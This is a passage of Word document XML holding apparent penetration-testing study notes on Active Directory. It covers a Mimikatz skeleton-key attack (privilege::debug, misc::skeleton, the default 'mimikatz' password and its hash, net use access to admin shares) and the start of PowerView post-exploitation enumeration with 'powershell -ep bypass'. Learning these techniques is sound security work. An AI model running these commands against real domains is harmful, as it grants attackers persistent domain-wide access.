        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>allows access to any machine with a master password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF259A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>implements skeleton key that abuses AS-REQ validation of encrypted timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7882574A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>using Kerberos RC4 Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5BA3A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>default hash - 60BA4FCADC466C7A033C178194C03DF6 (mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A100C6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Skeleton Key Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA788FD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>timestamps are encrypted with users NT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F42AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>domain controller tries to decrypt timestamp using users NT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDCED9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>once a skeleton key is implanted the domain controller tries to decrypt the timestamp using both the user NT hash and skeleton key NT hash allowing you access to the domain forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125392B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Preparing Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0EF465" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2B55C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB46F20" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>20 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6117FD42" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>misc::skeleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BB6B3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Accessing the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097CD62F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>default credential: mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153184F2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5F069" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>share will be accessible without the need for Admin password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4C455" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dir \\Desktop-1\c$ /user:Machine1 mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0CE911" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>access directory of Desktop-1 without ever knowing what users have access to Desktop-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D55F223" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>will not self-persist – can be scripted or persisted using other tools/techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7537150F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FD350" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ECA8F70" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BED7A55" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="307ABCA9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FA4788E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.varonis.com/blog/kerberos-authentication-explained/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13B1E5A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AC3500B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493862736.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21E287D2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.redsiege.com/wp-content/uploads/2020/04/20200430-kerb101.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A814441" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C243799" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Post-Exploitation Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3475B516" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration with Powerview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0D1EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74724F21" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Powerview is a powerful powershell script from powershell empire that can be used for enumerating a domain after shell has been gained in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6052A39E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>put Powerview on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5BBD56" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237B7D63" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5385FD14" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>bypasses execution policy of powershell allowing easy run of scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AD85B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start Powerview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B1113" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>. .\Downloads\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AABC9A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerate domain users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01122A5A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Get-NetUser | select cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF8055" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerate domain groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B1B36" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Get-NetGroup -GroupName *admin*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFE641" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find shared folders not set by default</w:t>
      </w:r>
    </w:p>
